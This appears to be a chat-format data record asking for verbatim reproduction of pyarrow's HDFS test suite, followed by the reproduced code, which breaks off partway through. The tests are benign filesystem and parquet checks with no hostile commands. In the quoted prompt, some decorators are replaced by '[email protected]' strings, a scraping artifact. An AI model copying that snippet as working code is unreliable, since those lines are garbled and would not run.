pjoin(self.tmp_path, 'info-base')\n file_path = pjoin(path, 'ex')\n self.hdfs.mkdir(path)\n\n data = b'foobarbaz'\n with self.hdfs.open(file_path, 'wb') as f:\n f.write(data)\n\n path_info = self.hdfs.info(path)\n file_path_info = self.hdfs.info(file_path)\n\n assert path_info['kind'] == 'directory'\n\n assert file_path_info['kind'] == 'file'\n assert file_path_info['size'] == len(data)\n\n def test_exists_isdir_isfile(self):\n dir_path = pjoin(self.tmp_path, 'info-base')\n file_path = pjoin(dir_path, 'ex')\n missing_path = pjoin(dir_path, 'this-path-is-missing')\n\n self.hdfs.mkdir(dir_path)\n with self.hdfs.open(file_path, 'wb') as f:\n f.write(b'foobarbaz')\n\n assert self.hdfs.exists(dir_path)\n assert self.hdfs.exists(file_path)\n assert not self.hdfs.exists(missing_path)\n\n assert self.hdfs.isdir(dir_path)\n assert not self.hdfs.isdir(file_path)\n assert not self.hdfs.isdir(missing_path)\n\n assert not self.hdfs.isfile(dir_path)\n assert self.hdfs.isfile(file_path)\n assert not self.hdfs.isfile(missing_path)\n\n def test_disk_usage(self):\n path = pjoin(self.tmp_path, 'disk-usage-base')\n p1 = pjoin(path, 'p1')\n p2 = pjoin(path, 'p2')\n\n subdir = pjoin(path, 'subdir')\n p3 = pjoin(subdir, 'p3')\n\n if self.hdfs.exists(path):\n self.hdfs.delete(path, True)\n\n self.hdfs.mkdir(path)\n self.hdfs.mkdir(subdir)\n\n data = b'foobarbaz'\n\n for file_path in [p1, p2, p3]:\n with self.hdfs.open(file_path, 'wb') as f:\n f.write(data)\n\n assert self.hdfs.disk_usage(path) == len(data) * 3\n\n def test_ls(self):\n base_path = pjoin(self.tmp_path, 'ls-test')\n self.hdfs.mkdir(base_path)\n\n dir_path = pjoin(base_path, 'a-dir')\n f1_path = pjoin(base_path, 'a-file-1')\n\n self.hdfs.mkdir(dir_path)\n\n f = self.hdfs.open(f1_path, 'wb')\n f.write(b'a' * 10)\n\n contents = sorted(self.hdfs.ls(base_path, False))\n assert contents == [dir_path, f1_path]\n\n def test_chmod_chown(self):\n path = pjoin(self.tmp_path, 'chmod-test')\n with self.hdfs.open(path, 'wb') as f:\n f.write(b'a' * 10)\n\n def test_download_upload(self):\n base_path = pjoin(self.tmp_path, 'upload-test')\n\n data = b'foobarbaz'\n buf = BytesIO(data)\n buf.seek(0)\n\n self.hdfs.upload(base_path, buf)\n\n out_buf = BytesIO()\n self.hdfs.download(base_path, out_buf)\n out_buf.seek(0)\n assert out_buf.getvalue() == data\n\n def test_file_context_manager(self):\n path = pjoin(self.tmp_path, 'ctx-manager')\n\n data = b'foo'\n with self.hdfs.open(path, 'wb') as f:\n f.write(data)\n\n with self.hdfs.open(path, 'rb') as f:\n assert f.size() == 3\n result = f.read(10)\n assert result == data\n\n def test_open_not_exist_error_message(self):\n # ARROW-226\n path = pjoin(self.tmp_path, 'does-not-exist-123')\n\n try:\n self.hdfs.open(path)\n except Exception as e:\n assert 'file does not exist' in e.args[0].lower()\n\n def test_read_whole_file(self):\n path = pjoin(self.tmp_path, 'read-whole-file')\n\n data = b'foo' * 1000\n with self.hdfs.open(path, 'wb') as f:\n f.write(data)\n\n with self.hdfs.open(path, 'rb') as f:\n result = f.read()\n\n assert result == data\n\n def _write_multiple_hdfs_pq_files(self, tmpdir):\n import pyarrow.parquet as pq\n nfiles = 10\n size = 5\n test_data = []\n for i in range(nfiles):\n df = test_parquet._test_dataframe(size, seed=i)\n\n df['index'] = np.arange(i * size, (i + 1) * size)\n\n # Hack so that we don't have a dtype cast in v1 files\n df['uint32'] = df['uint32'].astype(np.int64)\n\n path = pjoin(tmpdir, '{}.parquet'.format(i))\n\n table = pa.Table.from_pandas(df, preserve_index=False)\n with self.hdfs.open(path, 'wb') as f:\n pq.write_table(table, f)\n\n test_data.append(table)\n\n expected = pa.concat_tables(test_data)\n return expected\n\n @pytest.mark.pandas\n @pytest.mark.parquet\n def test_read_multiple_parquet_files(self):\n\n tmpdir = pjoin(self.tmp_path, 'multi-parquet-' + guid())\n\n self.hdfs.mkdir(tmpdir)\n\n expected = self._write_multiple_hdfs_pq_files(tmpdir)\n result = self.hdfs.read_parquet(tmpdir)\n\n _pandas_api.assert_frame_equal(result.to_pandas()\n .sort_values(by='index')\n .reset_index(drop=True),\n expected.to_pandas())\n\n @pytest.mark.pandas\n @pytest.mark.parquet\n def test_read_multiple_parquet_files_with_uri(self):\n import pyarrow.parquet as pq\n\n tmpdir = pjoin(self.tmp_path, 'multi-parquet-uri-' + guid())\n\n self.hdfs.mkdir(tmpdir)\n\n expected = self._write_multiple_hdfs_pq_files(tmpdir)\n path = _get_hdfs_uri(tmpdir)\n # TODO for URI it should not be needed to pass this argument\n result = pq.read_table(path, use_legacy_dataset=True)\n\n _pandas_api.assert_frame_equal(result.to_pandas()\n .sort_values(by='index')\n .reset_index(drop=True),\n expected.to_pandas())\n\n @pytest.mark.pandas\n @pytest.mark.parquet\n def test_read_write_parquet_files_with_uri(self):\n import pyarrow.parquet as pq\n\n tmpdir = pjoin(self.tmp_path, 'uri-parquet-' + guid())\n self.hdfs.mkdir(tmpdir)\n path = _get_hdfs_uri(pjoin(tmpdir, 'test.parquet'))\n\n size = 5\n df = test_parquet._test_dataframe(size, seed=0)\n # Hack so that we don't have a dtype cast in v1 files\n df['uint32'] = df['uint32'].astype(np.int64)\n table = pa.Table.from_pandas(df, preserve_index=False)\n\n pq.write_table(table, path, filesystem=self.hdfs)\n\n result = pq.read_table(\n path, filesystem=self.hdfs, use_legacy_dataset=True\n ).to_pandas()\n\n _pandas_api.assert_frame_equal(result, df)\n\n @pytest.mark.parquet\n @pytest.mark.pandas\n def test_read_common_metadata_files(self):\n tmpdir = pjoin(self.tmp_path, 'common-metadata-' + guid())\n self.hdfs.mkdir(tmpdir)\n test_parquet._test_read_common_metadata_files(self.hdfs, tmpdir)\n\n @pytest.mark.parquet\n @pytest.mark.pandas\n def test_write_to_dataset_with_partitions(self):\n tmpdir = pjoin(self.tmp_path, 'write-partitions-' + guid())\n self.hdfs.mkdir(tmpdir)\n test_parquet._test_write_to_dataset_with_partitions(\n tmpdir, filesystem=self.hdfs)\n\n @pytest.mark.parquet\n @pytest.mark.pandas\n def test_write_to_dataset_no_partitions(self):\n tmpdir = pjoin(self.tmp_path, 'write-no_partitions-' + guid())\n self.hdfs.mkdir(tmpdir)\n test_parquet._test_write_to_dataset_no_partitions(\n tmpdir, filesystem=self.hdfs)\n\n\nclass TestLibHdfs(HdfsTestCases, unittest.TestCase):\n\n @classmethod\n def check_driver(cls):\n if not pa.have_libhdfs():\n message = 'No libhdfs available on system'\n if os.environ.get('PYARROW_HDFS_TEST_LIBHDFS_REQUIRE'):\n pytest.fail(message)\n else:\n pytest.skip(message)\n\n def test_orphaned_file(self):\n hdfs = hdfs_test_client()\n file_path = self._make_test_file(hdfs, 'orphaned_file_test', 'fname',\n b'foobarbaz')\n\n f = hdfs.open(file_path)\n hdfs = None\n f = None # noqa\n\n\ndef _get_hdfs_uri(path):\n host = os.environ.get('ARROW_HDFS_TEST_HOST', 'localhost')\n try:\n port = int(os.environ.get('ARROW_HDFS_TEST_PORT', 0))\n except ValueError:\n raise ValueError('Env variable ARROW_HDFS_TEST_PORT was not '\n 'an integer')\n uri = \"hdfs://{}:{}{}\".format(host, port, path)\n\n return uri\n\n\[email protected]\[email protected]\[email protected]\[email protected]\ndef test_fastparquet_read_with_hdfs():\n from pandas.testing import assert_frame_equal\n\n try:\n import snappy # noqa\n except ImportError:\n pytest.skip('fastparquet test requires snappy')\n\n import pyarrow.parquet as pq\n fastparquet = pytest.importorskip('fastparquet')\n\n fs = hdfs_test_client()\n\n df = util.make_dataframe()\n\n table = pa.Table.from_pandas(df)\n\n path = '/tmp/testing.parquet'\n with fs.open(path, 'wb') as f:\n pq.write_table(table, f)\n\n parquet_file = fastparquet.ParquetFile(path, open_with=fs.open)\n\n result = parquet_file.to_pandas()\n assert_frame_equal(result, df)\n```",
"role": "user"
}
] |
[
{
"content": "Reproduce the code exactly as provided (keep formatting):\n<|memory_start|>```python\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\nimport os\nimport pickle\nimport pytest\nimport random\nimport unittest\n\nfrom io import BytesIO\nfrom os.path import join as pjoin\n\nimport numpy as np\nimport pyarrow as pa\nimport pyarrow.tests.test_parquet as test_parquet\n\nfrom pyarrow.pandas_compat import _pandas_api\nfrom pyarrow.tests import util\nfrom pyarrow.util import guid\n\n\n# ----------------------------------------------------------------------\n# HDFS tests\n\n\ndef hdfs_test_client():\n host = os.environ.get('ARROW_HDFS_TEST_HOST', 'default')\n user = os.environ.get('ARROW_HDFS_TEST_USER', None)\n try:\n port = int(os.environ.get('ARROW_HDFS_TEST_PORT', 0))\n except ValueError:\n raise ValueError('Env variable ARROW_HDFS_TEST_PORT was not '\n 'an integer')\n\n with pytest.warns(DeprecationWarning):\n return pa.hdfs.connect(host, port, user)\n\n\[email protected]\nclass HdfsTestCases:\n\n def _make_test_file(self, hdfs, test_name, test_path, test_data):\n base_path = pjoin(self.tmp_path, test_name)\n hdfs.mkdir(base_path)\n\n full_path = pjoin(base_path, test_path)\n\n with hdfs.open(full_path, 'wb') as f:\n f.write(test_data)\n\n return full_path\n\n @classmethod\n def setUpClass(cls):\n cls.check_driver()\n cls.hdfs = hdfs_test_client()\n cls.tmp_path = '/tmp/pyarrow-test-{}'.format(random.randint(0, 1000))\n cls.hdfs.mkdir(cls.tmp_path)\n\n @classmethod\n def tearDownClass(cls):\n cls.hdfs.delete(cls.tmp_path, recursive=True)\n cls.hdfs.close()\n\n def test_pickle(self):\n s = pickle.dumps(self.hdfs)\n h2 = pickle.loads(s)\n assert h2.is_open\n assert h2.host == self.hdfs.host\n assert h2.port == self.hdfs.port\n assert h2.user == self.hdfs.user\n assert h2.kerb_ticket == self.hdfs.kerb_ticket\n # smoketest unpickled client works\n h2.ls(self.tmp_path)\n\n def test_cat(self):\n path = pjoin(self.tmp_path, 'cat-test')\n\n data = b'foobarbaz'\n with self.hdfs.open(path, 'wb') as f:\n f.write(data)\n\n contents = self.hdfs.cat(path)\n assert contents == data\n\n def test_capacity_space(self):\n capacity = self.hdfs.get_capacity()\n space_used = self.hdfs.get_space_used()\n disk_free = self.hdfs.df()\n\n assert capacity > 0\n assert capacity > space_used\n assert disk_free == (capacity - space_used)\n\n def test_close(self):\n client = hdfs_test_client()\n assert client.is_open\n client.close()\n assert not client.is_open\n\n with pytest.raises(Exception):\n client.ls('/')\n\n def test_mkdir(self):\n path = pjoin(self.tmp_path, 'test-dir/test-dir')\n parent_path = pjoin(self.tmp_path, 'test-dir')\n\n self.hdfs.mkdir(path)\n assert self.hdfs.exists(path)\n\n self.hdfs.delete(parent_path, recursive=True)\n assert not self.hdfs.exists(path)\n\n def test_mv_rename(self):\n path = pjoin(self.tmp_path, 'mv-test')\n new_path = pjoin(self.tmp_path, 'mv-new-test')\n\n data = b'foobarbaz'\n with self.hdfs.open(path, 'wb') as f:\n f.write(data)\n\n assert self.hdfs.exists(path)\n self.hdfs.mv(path, new_path)\n assert not self.hdfs.exists(path)\n assert self.hdfs.exists(new_path)\n\n assert self.hdfs.cat(new_path) == data\n\n self.hdfs.rename(new_path, path)\n assert self.hdfs.cat(path) == data\n\n def test_info(self):\n path = pjoin(self.tmp_path, 'info-base')\n file_path = pjoin(path, 'ex')\n self.hdfs.mkdir(path)\n\n data = b'foobarbaz'\n with self.hdfs.open(file_path, 'wb') as f:\n f.write(data)\n\n path_info = self.hdfs.info(path)\n file_path_info = self.hdfs.info(file_path)\n\n assert path_info['kind'] == 'directory'\n\n assert file_path_info['kind'] == 'file'\n assert file_path_info['size'] == len(data)\n\n def test_exists_isdir_isfile(self):\n dir_path = pjoin(self.tmp_path, 'info-base')\n file_path = pjoin(dir_path, 'ex')\n missing_path = pjoin(dir_path, 'this-path-is-missing')\n\n self.hdfs.mkdir(dir_path)\n with self.hdfs.open(file_path, 'wb') as f:\n f.write(b'foobarbaz')\n\n assert self.hdfs.exists(dir_path)\n assert self.hdfs.exists(file_path)\n assert not self.hdfs.exists(missing_path)\n\n assert self.hdfs.isdir(dir_path)\n assert not self.hdfs.isdir(file_path)\n assert not self.hdfs.isdir(missing_path)\n\n assert not self.hdfs.isfile(dir_path)\n assert self.hdfs.isfile(file_path)\n assert not self.hdfs.isfile(missing_path)\n\n def test_disk_usage(self):\n path = pjoin(self.tmp_path, 'disk-usage-base')\n p1 = pjoin(path, 'p1')\n p2 = pjoin(path, 'p2')\n\n subdir = pjoin(path, 'subdir')\n p3 = pjoin(subdir, 'p3')\n\n if self.hdfs.exists(path):\n self.hdfs.delete(path, True)\n\n self.hdfs.mkdir(path)\n self.hdfs.mkdir(subdir)\n\n data = b'foobarbaz'\n\n for file_path in [p1, p2, p3]:\n with self.hdfs.open(file_path, 'wb') as f:\n f.write(data)\n\n assert self.hdfs.disk_usage(path) == len(data) * 3\n\n def test_ls(self):\n base_path = pjoin(self.tmp_path, 'ls-test')\n self.hdfs.mkdir(base_path)\n\n dir_path = pjoin(base_path, 'a-dir')\n f1_path = pjoin(base_path, 'a-file-1')\n\n self.hdfs.mkdir(dir_path)\n\n f = self.hdfs.open(f1_path, 'wb')\n f.write(b'a' * 10)\n\n contents = sorted(self.hdfs.ls(base_path, False))\n assert contents == [dir_path, f1_path]\n\n def test_chmod_chown(self):\n path = pjoin(self.tmp_path, 'chmod-test')\n with self.hdfs.open(path, 'wb') as f:\n f.write(b'a' * 10)\n\n def test_download_upload(self):\n base_path = pjoin(self.tmp_path, 'upload-test')\n\n data = b'foobarbaz'\n buf = BytesIO(data)\n buf.seek(0)\n\n self.hdfs.upload(base_path, buf)\n\n out_buf = BytesIO()\n self.hdfs.download(base_path, out_buf)\n out_buf.seek(0)\n assert out_buf.getvalue() == data\n\n def test_file_context_manager(self):\n path = pjoin(self.tmp_path, 'ctx-manager')\n\n data = b'foo'\n with self.hdfs.open(path, 'wb') as f:\n f.write(data)\n\n with self.hdfs.open(path, 'rb') as f:\n assert f.size() == 3\n result = f.read(10)\n assert result == data\n\n def test_open_not_exist_error_message(self):\n # ARROW-226\n path = pjoin(self.tmp_path, 'does-not-exist-123')\n\n try:\n self.hdfs.open(path)\n except Exception as e:\n assert 'file does not exist' in e.args[0].lower()\n\n def test_read_whole_file(self):\n path = pjoin(self.tmp_path, 'read-whole-file')\n\n data = b'foo' * 1000\n with self.hdfs.open(path, 'wb') as f:\n f.write(data)\n\n with self.hdfs.open(path, 'rb') as f:\n result = f.read()\n\n assert result == data\n\n def _write_multiple_hdfs_pq_files(self, tmpdir):\n import pyarrow.parquet as pq\n nfiles = 10\n size = 5\n test_data = []\n for i in range(nfiles):\n df = test_parquet._test_dataframe(size, seed=i)\n\n df['index'] = np.arange(i * size, (i + 1) * size)\n\n # Hack so that we don't have a dtype cast in v1 files\n df['uint32'] = df['uint32'].astype(np.int64)\n\n path = pjoin(tmpdir, '{}.parquet'.format(i))\n\n table = pa.Table.from_pandas(df, preserve_index=False)\n with self.hdfs.open(path, 'wb') as f:\n pq.write_table(table, f)\n\n test_data.append(table)\n\n expected = pa.concat_tables(test_data)\n return expected\n\n @pytest.mark.pandas\n @pytest.mark.parquet\n def test_read_multiple_parquet_files(self):\n\n tmpdir = pjoin(self.tmp_path, 'multi-parquet-' + guid())\n\n self.hdfs.mkdir(tmpdir)\n\n expected = self._write_multiple_hdfs_pq_files(tmpdir)\n result = self.hdfs.read_parquet(tmpdir)\n\n _pandas_api.assert_frame_equal(result.to_pandas()\n .sort_values(by='index')\n .reset_index(drop=True),\n expected.to_pandas())\n\n @pytest.mark.pandas\n @pytest.mark.parquet\n def test_read_multiple_parquet_files_with_uri(self):\n import pyarrow.parquet as pq\n\n tmpdir = pjoin(self.tmp_path, 'multi-parquet-uri-' + guid())\n\n self.hdfs.mkdir(tmpdir)\n\n expected = self._write_multiple_hdfs_pq_files(tmpdir)\n path = _get_hdfs_uri(tmpdir)\n # TODO for URI it should not be needed to pass this argument\n result = pq.read_table(path, use_legacy_dataset=True)\n\n _pandas_api.assert_frame_equal(result.to_pandas()\n .sort_values(by='index')\n .reset_index(drop=True),\n expected.to_pandas())\n\n @pytest.mark.pandas\n @pytest.mark.parquet\n def test_read_write_parquet_files_with_uri(self):\n import pyarrow.parquet as pq\n\n tmpdir = pjoin(self.tmp_path, 'uri-parquet-' + guid())\n self.hdfs.mkdir(tmpdir)\n path = _get_hdfs_uri(pjoin(tmpdir, 'test.parquet'))\n\n size = 5\n df = test_parquet._test_dataframe(size, seed=0)\n # Hack so that we don't have a dtype cast in v1 files\n df['uint32'] = df['uint32'].astype(np.int64)\n table = pa.Table.from_pandas(df, preserve_index=False)\n\n pq.write_table(table, path, filesystem=self.hdfs)\n\n result = pq.read_table(\n path, filesystem=self.hdfs, use_legacy_dataset=True\n ).to_pandas()\n\n _pandas_api.assert_frame_equal(result, df)\n\n @pytest.mark.parquet\n @pytest.mark.pandas\n def test_read_common_metadata_files(self):\n tmpdir = pjoin(self.tmp_path, 'common-metadata-' + guid())\n self.hdfs.mkdir(tmpdir)\n test_parquet._test_read_common_metadata_files(self.hdfs, tmpdir)\n\n @pytest.mark.parquet\n @pytest.mark.pandas\n def test_write_to_dataset_with_partitions(self):\n tmpdir = pjoin(self.tmp_path, 'write-partitions-' + guid())\n self.hdfs.mkdir(tmpdir)\n test_parquet._test_write_to_dataset_with_partitions(\n tmpdir, filesystem=self.hdfs)\n\n @pytest.mark.parquet\n @pytest.mark.pandas\n def test_write_to_dataset_no_partitions(self):\n tmpdir = pjoin(self.tmp_path, 'write-no_partitions-' + guid())\n self.hdfs.mkdir(tmpdir)\n test_parquet._test_write_to_dataset_no_partitions(\n tmpdir, filesystem=self.hdfs)\n\n\nclass TestLibHdfs(HdfsTestCases, unittest.TestCase):\n\n @classmethod\n def check_driver(cls):\n if not pa.have_libhdfs():\n message = 'No libhdfs available on system'\n if os.environ.get('PYARROW_HDFS_TEST_LIBHDFS_REQUIRE'):\n pytest.fail(message)\n else:\n pytest.skip(message)\n\n def test_orphaned_file(self):\n hdfs = hdfs_test_client()\n file_path = self._make_test_file(hdfs, 'orphaned_file_test', 'fname',\n b'foobarbaz')\n\n f = hdfs.open(file_path)\n hdfs = None\n f = None # noqa\n\n\ndef _get_hdfs_uri(path):\n host = os.environ.get('ARROW_HDFS_TEST_HOST', 'localhost')\n try:\n port = int(os.environ.get('ARROW_HDFS_TEST_PORT', 0))\n except ValueError:\n raise ValueError('Env variable ARROW_HDFS_TEST_PORT was not '\n 'an integer')\n uri = \"hdfs://{}:{}{}\".format(host, port, path)\n\n return uri\n\n\[email protected]\[email protected]\[email protected]\[email protected]\ndef test_fastparquet_read_with_hdfs():\n from pandas.testing import assert_frame_equal\n\n try:\n import snappy # noqa\n except ImportError:\n pytest.skip('fastparquet test requires snappy')\n\n import pyarrow.parquet as pq\n fastparquet = pytest.importorskip('fastparquet')\n\n fs = hdfs_test_client()\n\n df = util.make_dataframe()\n\n table = pa.Table.from_pandas(df)\n\n path = '/tmp/testing.parquet'\n with fs.open(path, 'wb') as f:\n pq.write_table(table, f)\n\n parquet_file = fastparquet.ParquetFile(path, open_with=fs.open)\n\n result = parquet_file.to_pandas()\n assert_frame_equal(result, df)\n```<|memory_end|>",
"role": "user"
}
] |
```python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import pickle
import pytest
import random
import unittest
from io import BytesIO
from os.path import join as pjoin
import numpy as np
import pyarrow as pa
import pyarrow.tests.test_parquet as test_parquet
from pyarrow.pandas_compat import _pandas_api
from pyarrow.tests import util
from pyarrow.util import guid
# ----------------------------------------------------------------------
# HDFS tests
def hdfs_test_client():
host = os.environ.get('ARROW_HDFS_TEST_HOST', 'default')
user = os.environ.get('ARROW_HDFS_TEST_USER', None)
try:
port = int(os.environ.get('ARROW_HDFS_TEST_PORT', 0))
except ValueError:
raise ValueError('Env variable ARROW_HDFS_TEST_PORT was not '
'an integer')
with pytest.warns(DeprecationWarning):
return pa.hdfs.connect(host, port, user)
@pytest.mark.hdfs
class HdfsTestCases:
def _make_test_file(self, hdfs, test_name, test_path, test_data):
base_path = pjoin(self.tmp_path, test_name)
hdfs.mkdir(base_path)
full_path = pjoin(base_path, test_path)
with hdfs.open(full_path, 'wb') as f:
f.write(test_data)
return full_path
@classmethod
def setUpClass(cls):
cls.check_driver()
cls.hdfs = hdfs_test_client()
cls.tmp_path = '/tmp/pyarrow-test-{}'.format(random.randint(0, 1000))
cls.hdfs.mkdir(cls.tmp_path)
@classmethod
def tearDownClass(cls):
cls.hdfs.delete(cls.tmp_path, recursive=True)
cls.hdfs.close()
def test_pickle(self):
s = pickle.dumps(self.hdfs)
h2 = pickle.loads(s)
assert h2.is_open
assert h2.host == self.hdfs.host
assert h2.port == self.hdfs.port
assert h2.user == self.hdfs.user
assert h2.kerb_ticket == self.hdfs.kerb_ticket
# smoketest unpickled client works
h2.ls(self.tmp_path)
def test_cat(self):
path = pjoin(self.tmp_path, 'cat-test')
data = b'foobarbaz'
with self.hdfs.open(path, 'wb') as f:
f.write(data)
contents = self.hdfs.cat(path)
assert contents == data
def test_capacity_space(self):
capacity = self.hdfs.get_capacity()
space_used = self.hdfs.get_space_used()
disk_free = self.hdfs.df()
assert capacity > 0
assert capacity > space_used
assert disk_free == (capacity - space_used)
def test_close(self):
client = hdfs_test_client()
assert client.is_open
client.close()
assert not client.is_open
with pytest.raises(Exception):
client.ls('/')
def test_mkdir(self):
path = pjoin(self.tmp_path, 'test-dir/test-dir')
parent_path = pjoin(self.tmp_path, 'test-dir')
self.hdfs.mkdir(path)
assert self.hdfs.exists(path)
self.hdfs.delete(parent_path, recursive=True)
assert not self.hdfs.exists(path)
def test_mv_rename(self):
path = pjoin(self.tmp_path, 'mv-test')
new_path = pjoin(self.tmp_path, 'mv-new-test')
data = b'foobarbaz'
with self.hdfs.open(path, 'wb') as f:
f.write(data)
assert self.hdfs.exists(path)
self.hdfs.mv(path, new_path)
assert not self.hdfs.exists(path)
assert self.hdfs.exists(new_path)
assert self.hdfs.cat(new_path) == data
self.hdfs.rename(new_path, path)
assert self.hdfs.cat(path) == data
def test_info(self):
path = pjoin(self.tmp_path, 'info-base')
file_path = pjoin(path, 'ex')
self.hdfs.mkdir(path)
data = b'foobarbaz'
with self.hdfs.open(file_path, 'wb') as f:
f.write(data)
path_info = self.hdfs.info(path)
file_path_info = self.hdfs.info(file_path)
assert path_info['kind'] == 'directory'
assert file_path_info['kind'] == 'file'
assert file_path_info['size'] == len(data)
def test_exists_isdir_isfile(self):
dir_path = pjoin(self.tmp_path, 'info-base')
file_path = pjoin(dir_path, 'ex')
missing_path = pjoin(dir_path, 'this-path-is-missing')
self.hdfs.mkdir(dir_path)
with self.hdfs.open(file_path, 'wb') as f:
f.write(b'foobarbaz')
assert self.hdfs.exists(dir_path)
assert self.hdfs.exists(file_path)
assert not self.hdfs.exists(missing_path)
assert self.hdfs.isdir(dir_path)
assert not self.hdfs.isdir(file_path)
assert not self.hdfs.isdir(missing_path)
assert not self.hdfs.isfile(dir_path)
assert self.hdfs.isfile(file_path)
assert not self.hdfs.isfile(missing_path)
def test_disk_usage(self):
path = pjoin(self.tmp_path, 'disk-usage-base')
p1 = pjoin(path, 'p1')
p2 = pjoin(path, 'p2')
subdir = pjoin(path, 'subdir')
p3 = pjoin(subdir, 'p3')
if self.hdfs.exists(path):
self.hdfs.delete(path, True)
self.hdfs.mkdir(path)
self.hdfs.mkdir(subdir)
data = b'foobarbaz'
for file_path in [p1, p2, p3]:
with self.hdfs.open(file_path, 'wb') as f:
f.write(data)
assert self.hdfs.disk_usage(path) == len(data) * 3
def test_ls(self):
base_path = pjoin(self.tmp_path, 'ls-test')
self.hdfs.mkdir(base_path)
dir_path = pjoin(base_path, 'a-dir')
f1_path = pjoin(base_path, 'a-file-1')
self.hdfs.mkdir(dir_path)
f = self.hdfs.open(f1_path, 'wb')
f.write(b'a' * 10)
contents = sorted(self.hdfs.ls(base_path, False))
assert contents == [dir_path, f1_path]
def test_chmod_chown(self):
path = pjoin(self.tmp_path, 'chmod-test')
with self.hdfs.open(path, 'wb') as f:
f.write(b'a' * 10)
def test_download_upload(self):
base_path = pjoin(self.tmp_path, 'upload-test')
data = b'foobarbaz'
buf = BytesIO(data)
buf.seek(0)
self.hdfs.upload(base_path, buf)
out_buf = BytesIO()
self.hdfs.download(base_path, out_buf)
out_buf.seek(0)
assert out_buf.getvalue() == data
def test_file_context_manager(self):
path = pjoin(self.tmp_path, 'ctx-manager')
data = b'foo'
with self.hdfs.open(path, 'wb') as f:
f.write(data)
with self.hdfs.open(path, 'rb') as f:
assert f.size() == 3
result = f.read(10)
assert result == data
def test_open_not_exist_error_message(self):
# ARROW-226
path = pjoin(self.tmp_path, 'does-not-exist-123')
try:
self.hdfs.open(path)
except Exception as e:
assert 'file does not exist' in e.args[0].lower()
def test_read_whole_file(self):
path = pjoin(self.tmp_path, 'read-whole-file')
data = b'foo' * 1000
with self.hdfs.open(path, 'wb') as f:
f.write(data)
with self.hdfs.open(path, 'rb') as f:
result = f.read()
assert result == data
def _write_multiple_hdfs_pq_files(self, tmpdir):
import pyarrow.parquet as pq
nfiles = 10
size = 5
test_data = []
for i in range(nfiles):
df = test_parquet._test_dataframe(size, seed=i)
df['index'] = np.arange(i * size, (i + 1) * size)
# Hack so that we don't have a dtype cast in v1 files
df['uint32'] = df['uint32'].astype(np.int64)
path = pjoin(tmpdir, '{}.parquet'.format(i))
table = pa.Table.from_pandas(df, preserve_index=False)
with self.hdfs.open(path, 'wb') as f:
pq.write_table(table, f)
test_data.append(table)
expected = pa.concat_tables(test_data)
return expected
@pytest.mark.pandas
@pytest.mark.parquet
def test_read_multiple_parquet_files(self):
tmpdir = pjoin(self.tmp_path, 'multi-parquet-' + guid())
self.hdfs.mkdir(tmpdir)
expected = self._write_multiple_hdfs_pq_files(tmpdir)
result = self.hdfs.read_parquet(tmpdir)
_pandas_api.assert_frame_equal(result.to_pandas()
.sort_values(by='index')
.reset_index(drop=True),
expected.to_pandas())
@pytest.mark.pandas
@pytest.mark.parquet
def test_read_multiple_parquet_files_with_uri(self):
import pyarrow.parquet as pq
tmpdir = pjoin(self.tmp_path, 'multi-parquet-uri-' + guid())
self.hdfs.mkdir(tmpdir)
expected = self._write_multiple_hdfs_pq_files(tmpdir)
path = _get_hdfs_uri(tmpdir)
# TODO for URI it should not be needed to pass this argument
result = pq.read_table(path, use_legacy_dataset=True)
_pandas_api.assert_frame_equal(result.to_pandas()
.sort_values(by='index')
.reset_index(drop=True),
expected.to_pandas())
@pytest.mark.pandas
@pytest.mark.parquet
def test_read_write_parquet_files_with_uri(self):
import pyarrow.parquet as pq
tmpdir = pjoin(self.tmp_path, 'uri-parquet-' + guid())
self.hdfs.mkdir(tmpdir)
path = _get_hdfs_uri(pjoin(tmpdir, 'test.parquet'))
size = 5
df = test_parquet._test_dataframe(size, seed=0)
# Hack so that we don't have a dtype cast in v1 files
df['uint32'] = df['uint32'].astype(np.int64)
table = pa.Table.from_pandas(df, preserve_index=False)
pq.write_table(table, path, filesystem=self.hdfs)
result = pq.read_table(
path, filesystem=self.hdfs, use_legacy_dataset=True
).to_pandas()
_pandas_api.assert_frame_equal(result, df)
@pytest.mark.parquet
@pytest.mark.pandas
def test_read_common_metadata_files(self):
tmpdir = pjoin(self.tmp_path, 'common-metadata-' + guid())
self.hdfs.mkdir(tmpdir)
test_parquet._test_read_common_metadata_files(self.hdfs, tmpdir)
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_to_dataset_with_partitions(self):
tmpdir = pjoin(self.tmp_path, 'write-partitions-' + guid())
self.hdfs.mkdir(tmpdir)
test_parquet._test_write_to_dataset_with_partitions(
tmpdir, filesystem=self.hdfs)
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_to_dataset_no_partitions(self):
tmpdir = pjoin(self.tmp_path, 'write-no_partitions-' + guid())
self.hdfs.mkdir(tmpdir)
test_parquet._test_write_to_dataset_no_partitions(
tmpdir, filesystem=self.hdfs)
class TestLibHdfs(HdfsTestCases, unittest.TestCase):
@classmethod
def check_driver(cls):
if not pa.have_libhdfs():
message = 'No libhdfs available on system'
if os.environ.get('PYARROW_HDFS_TEST_LIBHDFS_REQUIRE'):
pytest.fail(message)
else:
pytest.skip(message)
def test_orphaned_file(self):
hdfs = hdfs_test_client()
file_path = self._make_test_file(hdfs, 'orphaned_file_test', 'fname',
b'foobarbaz')
f = hdfs.open(file_path)
hdfs = None
f = None # noqa
def _get_hdfs_uri(path):
host = os.environ.get('ARROW_HDFS_TEST_HOST', 'localhost')
try:
